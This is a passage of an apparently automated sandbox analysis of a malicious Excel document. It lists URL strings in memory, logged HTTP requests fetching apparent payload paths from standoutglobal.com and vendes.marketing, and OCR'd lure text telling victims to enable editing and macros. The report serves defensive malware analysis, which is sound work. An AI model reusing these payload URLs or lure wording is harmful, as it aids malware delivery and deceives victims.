    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/happy-elementor-addons/assets/fonts/style.min.css?ver=3.
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/happy-elementor-addons/assets/js/happy-addons.min.js?ver
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/ie.css?ver=1.4
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/AE.svg
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/anuncios-300x270.png
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/anuncios.png
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/apple_android.svg
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/elementor.svg
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/figma.svg
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/framer.svg
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-facebook.png
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-google-adwords.png
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-instagram.png
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-youtube.png
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/microsoft.svg
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/visual-Studio.svg
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/webflow.svg
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1024x348.png
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1536x522.png
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1568x533.png
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-2048x696.png
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-300x102.png
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-768x261.png
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/global.css?ver=1637592552
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-1522.css?ver=1638212153
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-2017.css?ver=1638212282
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-2157.css?ver=1638212282
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-5.css?ver=1637592550
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/caso-exito1.png
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/comentario1.jpg
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/comentario5-m.jpg
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/comentario6.jpg
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/css/dist/block-library/style.min.css?ver=5.8.2
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/js/imagesloaded.min.js?ver=4.1.4
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/js/wp-embed.min.js?ver=5.8.2
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/wlwmanifest.xml
    Source: EXCEL.EXE, 00000000.00000003.496187028.0000000013641000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.768882304.0000000015CDE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497598992.000000001353C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504647326.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620387042.0000000015CC9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.677945944.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581482859.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678673663.0000000015CDD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497249883.0000000013641000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579110952.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505338190.000000001353C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.641789083.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.677925063.0000000015CC9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.768840672.0000000015CC6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620403646.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637473162.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756202435.0000000015CC4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.617281899.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.577081581.0000000015CD6000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-json/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2F
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2F&format=
    Source: EXCEL.EXE, 00000000.00000003.496187028.0000000013641000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.768882304.0000000015CDE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497598992.000000001353C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504647326.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620387042.0000000015CC9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.677945944.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581482859.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678673663.0000000015CDD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497249883.0000000013641000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579110952.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505338190.000000001353C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.641789083.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.677925063.0000000015CC9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.768840672.0000000015CC6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620403646.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637473162.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756202435.0000000015CC4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.617281899.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.577081581.0000000015CD6000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-json/wp/v2/pages/1522
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/xmlrpc.php?rsd
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicesF)
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://web.microsoftstream.com/video/4
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/.
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ExchangeAutoDiscoverhttps:/
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios&
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://wus2.contentsync.
    Source: EXCEL.EXE, 00000000.00000003.756085438.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576719662.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504427495.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: EXCEL.EXE, 00000000.00000003.679220709.0000000013341000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496781565.0000000013341000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756599523.0000000013341000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301274679.0000000013341000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576000870.0000000013341000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Azur
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.msom
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://www.thinkwithgoogle.com/intl/es-419/futuro-del-marketing/transformacion-digital/tiendas-omni
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://www.thinkwithgoogle.com/intl/es-419/insights/tendencias-de-consumo/6-certezas-sobre-el-nuevo
    Source: unknownDNS traffic detected: queries for: standoutglobal.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: vendes.marketing
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /2/MWpqeVgZ/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: standoutglobal.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /transmigrant/Wplzr/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: vendes.marketingConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 107.180.46.229:443 -> 192.168.2.3:49807 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing, please click "Enable Conte
    Source: Screenshot number: 4Screenshot OCR: protected documents. r 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabl
    Source: Screenshot number: 4Screenshot OCR: Enable Content" button 6 * "=, 7 m = : I 8 9 RunDLL X 10 11 12 I): 13_ There was a probl
